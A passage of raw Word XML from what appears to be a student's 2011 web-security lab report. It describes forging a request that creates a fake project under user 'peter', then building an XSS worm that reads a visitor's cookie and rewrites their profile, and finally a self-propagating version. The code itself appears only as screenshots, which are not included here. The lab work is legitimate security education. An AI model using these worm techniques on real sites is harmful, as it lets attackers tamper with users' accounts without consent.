          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:r w:rsidR="006A3ABD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HTTPheader</w:t>
      </w:r>
      <w:r w:rsidR="00DD4655">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, we could get </w:t>
      </w:r>
      <w:r w:rsidR="00992E0F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00DD4655">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
      <w:r w:rsidR="002D11B0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D5D33" w14:textId="6558FE92" w:rsidR="00CE56F8" w:rsidRDefault="00810671" w:rsidP="00F54070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52F6D64" wp14:editId="51BD46FB">
            <wp:extent cx="5266055" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.08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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.08.2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D27F" w14:textId="2158CDD6" w:rsidR="001E2453" w:rsidRDefault="000B1926" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t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, we could write a java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>program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con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">nect to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> system to create a </w:t>
      </w:r>
      <w:r w:rsidR="004825D5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fake project</w:t>
      </w:r>
      <w:r w:rsidR="001E2453">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465070A1" w14:textId="6358DAB3" w:rsidR="00556805" w:rsidRDefault="0090017E" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4B24DB" wp14:editId="1D97CB24">
            <wp:extent cx="5257800" cy="4318000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 20" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 8.44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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 8.44.2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AC0E" w14:textId="394F9152" w:rsidR="00556805" w:rsidRDefault="00556805" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBE4737" w14:textId="77777777" w:rsidR="00556805" w:rsidRDefault="00556805" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABED050" w14:textId="77777777" w:rsidR="00556805" w:rsidRDefault="00556805" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6C7E84" w14:textId="3E03EC33" w:rsidR="004A4D3C" w:rsidRDefault="00C17B32" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>These a</w:t>
      </w:r>
      <w:r w:rsidR="00620F01">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>re projects that owned by peter before attack happen</w:t>
      </w:r>
      <w:r w:rsidR="00DC0179">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10226A92" wp14:editId="45BB19D3">
            <wp:extent cx="5257800" cy="1735455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.23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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.23.51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74EF" w14:textId="16EE8A97" w:rsidR="000C7824" w:rsidRDefault="000C7824" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Because my Mac computer already has Java compiler, so instead run a new Ubuntu image on virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00DF19B9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, I use Mac terminal to compile and run the Java program</w:t>
      </w:r>
      <w:r w:rsidR="00245D6B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04C798" w14:textId="4ED4AC76" w:rsidR="002A5D8E" w:rsidRDefault="003E2E22" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E50E870" wp14:editId="05BD6B93">
            <wp:extent cx="5316855" cy="5740400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.13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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.13.02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D179" w14:textId="478456D9" w:rsidR="000C7824" w:rsidRDefault="003E2E22" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">We could see the </w:t>
      </w:r>
      <w:r w:rsidR="009156BD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>server response the request, and return the</w:t>
      </w:r>
      <w:r w:rsidR="005A5603">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> html codes back</w:t>
      </w:r>
      <w:r w:rsidR="00A32E3C">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AD5E2" w14:textId="3A316C98" w:rsidR="000C7824" w:rsidRDefault="002201D6" w:rsidP="00F54070">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>And we could also find the fake project that has been created under peter</w:t>
      </w:r>
      <w:r w:rsidR="00FC7C87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E07A03C" wp14:editId="359B1BE7">
            <wp:extent cx="5266055" cy="1845945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="22" name="Picture 22" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.24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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.24.28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8375" w14:textId="04CD8F70" w:rsidR="00F54070" w:rsidRDefault="00F54070" w:rsidP="00F54070">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc183098920"/>
      <w:r>
        <w:t>Task 5: Writing an XSS</w:t>
      </w:r>
      <w:r w:rsidR="00730437">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="510A325E" w14:textId="5835AC83" w:rsidR="00730437" w:rsidRDefault="003E72B5" w:rsidP="00730437">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this task, our JavaScript would no just popup simple </w:t>
      </w:r>
      <w:r w:rsidR="00B22574">
        <w:t>message;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it would modify the visitor’s profile </w:t>
      </w:r>
      <w:r w:rsidR="00C41FF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>at back</w:t>
      </w:r>
      <w:r w:rsidR="004932EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25BB2F" w14:textId="104B11FC" w:rsidR="00072EAF" w:rsidRDefault="00072EAF" w:rsidP="007304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rom the task</w:t>
      </w:r>
      <w:r w:rsidR="00940968"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 xml:space="preserve">, we see that we could link to a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file, and in that file, we could do much more things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F0292" w14:textId="67CB525C" w:rsidR="00C47D2E" w:rsidRDefault="00C47D2E" w:rsidP="007304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rom the task</w:t>
      </w:r>
      <w:r w:rsidR="00037901">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2, we could get the</w:t>
      </w:r>
      <w:r w:rsidR="009E2CDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00767AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>visitor</w:t>
      </w:r>
      <w:r w:rsidR="00767AD2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00767AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="009E2CDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00DC47EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> informatio</w:t>
      </w:r>
      <w:r w:rsidR="00353446">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00F22FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> by JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="002A1056">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the XSS Worm </w:t>
      </w:r>
      <w:r w:rsidR="002A1056">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>progra</w:t>
      </w:r>
      <w:r w:rsidR="002A1056">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05277954" w14:textId="49A96D8E" w:rsidR="00D939F1" w:rsidRDefault="00D93F49" w:rsidP="00730437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167973C4" wp14:editId="57FAC020">
            <wp:extent cx="5266055" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.17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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.17.08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FAE3" w14:textId="6033BA66" w:rsidR="00072EAF" w:rsidRDefault="000749AD" w:rsidP="007304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e only problem would be the name of visitor, because</w:t>
      </w:r>
      <w:r w:rsidR="007E19FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we could not expect who will visit the profile</w:t>
      </w:r>
      <w:r w:rsidR="00860B19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A39AF" w14:textId="05AA78E0" w:rsidR="00860B19" w:rsidRDefault="00860B19" w:rsidP="007304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ctually, we want to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>affect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> every visitor</w:t>
      </w:r>
      <w:r w:rsidR="00897CAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we use </w:t>
      </w:r>
      <w:r w:rsidR="00897CAF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidR="00897CAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> codes to </w:t>
      </w:r>
      <w:r w:rsidR="00194D56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">get visitor name, after the name is got, we call the xssworm() </w:t>
      </w:r>
      <w:r w:rsidR="00194D56">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="00194D56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to modify visitor</w:t>
      </w:r>
      <w:r w:rsidR="00194D56">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00194D56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s profile</w:t>
      </w:r>
      <w:r w:rsidR="00AD39E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F670DB" w14:textId="17FF77A9" w:rsidR="003816D7" w:rsidRDefault="00A66F74" w:rsidP="00730437">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">I add “alert(name);” </w:t>
      </w:r>
      <w:r w:rsidR="00062550">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003816D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">o indicate the </w:t>
      </w:r>
      <w:r w:rsidR="00AA12B4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pro</w:t>
      </w:r>
      <w:r w:rsidR="00AA12B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="004071F6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>has been affect</w:t>
      </w:r>
      <w:r w:rsidR="00AA52D4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, because</w:t>
      </w:r>
      <w:r w:rsidR="00DB70FD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> only the affected project will run this JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00EE18E7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. And</w:t>
      </w:r>
      <w:r w:rsidR="006B2E54">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> it also help us to know user who current logged in and vi</w:t>
      </w:r>
      <w:r w:rsidR="00873FD5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sit the profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B1066" w14:textId="7185FFFB" w:rsidR="00730437" w:rsidRDefault="007E19FB" w:rsidP="00730437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5615D3" wp14:editId="5628AD1C">
            <wp:extent cx="5266055" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 24" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.1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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.16.4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396" w14:textId="42B8693F" w:rsidR="00E0067B" w:rsidRDefault="00E0067B" w:rsidP="00730437">
      <w:r>
        <w:t>As we done in task</w:t>
      </w:r>
      <w:r w:rsidR="0045033A">
        <w:t xml:space="preserve"> 1,</w:t>
      </w:r>
      <w:r w:rsidR="004A156B">
        <w:t xml:space="preserve"> in peter’s project, we put the source of XSS worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD65332" w14:textId="6F483422" w:rsidR="0018550E" w:rsidRDefault="00E414D8" w:rsidP="00730437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E77594" wp14:editId="3BD180D5">
            <wp:extent cx="5266055" cy="2303145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="25" name="Picture 25" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.2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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 11.27.5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5F0C" w14:textId="3F8386C3" w:rsidR="000503DF" w:rsidRDefault="00844F8B" w:rsidP="00730437">
      <w:r>
        <w:t xml:space="preserve">Now login as </w:t>
      </w:r>
      <w:r w:rsidR="007B14E5">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>lice</w:t>
      </w:r>
      <w:r w:rsidR="001E1A7A">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED70CED" w14:textId="7243FE6D" w:rsidR="004C05DB" w:rsidRDefault="00AA79FF" w:rsidP="00730437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02B337E1" wp14:editId="4D73E5CE">
            <wp:extent cx="5266055" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="26" name="Picture 26" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.2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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.21.03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9FB2" w14:textId="7A7E6212" w:rsidR="00AA79FF" w:rsidRDefault="00AA79FF" w:rsidP="00730437">
      <w:r>
        <w:t>Use alice to visit peter’s profile</w:t>
      </w:r>
      <w:r w:rsidR="00A8351E">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAF5E6" w14:textId="1EC96917" w:rsidR="004702E7" w:rsidRDefault="001F1BB0" w:rsidP="00730437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69ED2EF1" wp14:editId="7A0EA47E">
            <wp:extent cx="5266055" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 28" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.21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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.21.19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A2A5" w14:textId="77777777" w:rsidR="005B55EB" w:rsidRDefault="001F1BB0" w:rsidP="00730437">
      <w:r>
        <w:t>From the popup</w:t>
      </w:r>
      <w:r w:rsidR="00C05C58">
        <w:t>, we could say that alice has been attacked</w:t>
      </w:r>
      <w:r w:rsidR="00F15CE3">
        <w:t>. So check the alice’s profile</w:t>
      </w:r>
      <w:r w:rsidR="006C6179">
        <w:t xml:space="preserve"> again</w:t>
      </w:r>
      <w:r w:rsidR="005B55EB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1532BD" w14:textId="5DACA18E" w:rsidR="001F1BB0" w:rsidRDefault="00E31B91" w:rsidP="00730437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C64C81C" wp14:editId="1B2B4447">
            <wp:extent cx="5266055" cy="2861945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="30" name="Picture 30" descr="Macintosh HD:Users:Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.21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Ider:Desktop:screenshot:Screen Shot 2011-11-16 at 6.21.30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07EA" w14:textId="58CD1EF9" w:rsidR="00E31B91" w:rsidRDefault="00156EEE" w:rsidP="00730437">
      <w:r>
        <w:t>We see that</w:t>
      </w:r>
      <w:r w:rsidR="00E13772">
        <w:t xml:space="preserve"> the profile information has been modified with the information we put in </w:t>
      </w:r>
      <w:r w:rsidR="0001479C">
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00260D0A">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0001479C">
        <w:t>cript</w:t>
      </w:r>
      <w:r w:rsidR="000A7CF1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F0E122" w14:textId="1EF9CB84" w:rsidR="00730437" w:rsidRDefault="00730437" w:rsidP="00C940C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc183098921"/>
      <w:r>
        <w:t>Task 6: Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="3F45DD15" w14:textId="354DC322" w:rsidR="001E18EF" w:rsidRDefault="00631B30" w:rsidP="001E18EF">
      <w:r>
        <w:t>Since</w:t>
      </w:r>
      <w:r w:rsidR="008F4D18">
        <w:t xml:space="preserve"> we have succeeded in task 5, this task would be easier</w:t>
      </w:r>
      <w:r w:rsidR="00D93449">
        <w:t>, as instead</w:t>
      </w:r>
      <w:r w:rsidR="00F67674">
        <w:t xml:space="preserve"> put simple information in profile, we want to</w:t>
      </w:r>
      <w:r w:rsidR="00F647EB">
        <w:t xml:space="preserve"> put the Worm JavaScript in </w:t>
      </w:r>
      <w:r w:rsidR="00A66569">
        <w:t>the field</w:t>
      </w:r>
      <w:r w:rsidR="00C71774">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF099EB" w14:textId="4FEECA44" w:rsidR="00C71774" w:rsidRDefault="00C71774" w:rsidP="001E18EF">
      <w:r>
        <w:t>So we modify the</w:t>
      </w:r>
      <w:r w:rsidR="00291F46">
        <w:t xml:space="preserve"> JavaScript as following</w:t>
      </w:r>
      <w:r w:rsidR="0097482B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3084EA" w14:textId="74BC6361" w:rsidR="00F92C08" w:rsidRDefault="00F92C08" w:rsidP="001E18EF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D43FB95" wp14:editId="6F0382C3">
            <wp:extent cx="5266055" cy="3615055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Picture 32" descr="Macintosh HD:Users:Ider:Desktop:Screen Shot 2011-11-16 at 9.0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Ider:Desktop:Screen Shot 2011-11-16 at 9.07.27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3F2D" w14:textId="32F1F237" w:rsidR="001E18EF" w:rsidRDefault="000E3AE9" w:rsidP="001E18EF">
      <w:r>
        <w:t>The only different is the</w:t>
      </w:r>
      <w:r w:rsidR="00356F95">
        <w:t xml:space="preserve"> company value</w:t>
      </w:r>
      <w:r w:rsidR="001B78E5">
        <w:t>, we just put the</w:t>
      </w:r>
      <w:r w:rsidR="007610BB">
        <w:t xml:space="preserve"> value that we enter into peter</w:t>
      </w:r>
      <w:r w:rsidR="002E1CB1">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="007C7051">
        <w:t>s profile</w:t>
      </w:r>
      <w:r w:rsidR="00131AFC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FD958" w14:textId="095B2C4A" w:rsidR="00131AFC" w:rsidRDefault="00FD024D" w:rsidP="001E18EF">
      <w:r>
        <w:t>As the</w:t>
      </w:r>
      <w:r w:rsidR="003F5AFE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E429E7">
        <w:t xml:space="preserve">information will pass through network, we need to </w:t>
      </w:r>
      <w:r w:rsidR="002247C5">
        <w:t>escape the</w:t>
      </w:r>
      <w:r w:rsidR="00613B3B">
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r w:rsidR="00145131">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D80CDE" w14:textId="61022779" w:rsidR="00B94F64" w:rsidRDefault="00F44C7F" w:rsidP="001E18EF">
      <w:r>
        <w:t>Now, login in as alice, and visit peter’s profile again</w:t>
      </w:r>
      <w:r w:rsidR="003C345C">
        <w:t xml:space="preserve">, it would be the same as before, but if we use alice to visit herself </w:t>
      </w:r>
      <w:r w:rsidR="00BC6C1D">
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidR="00620430">
        <w:t>, we also could a popup</w:t>
      </w:r>
    </w:p>
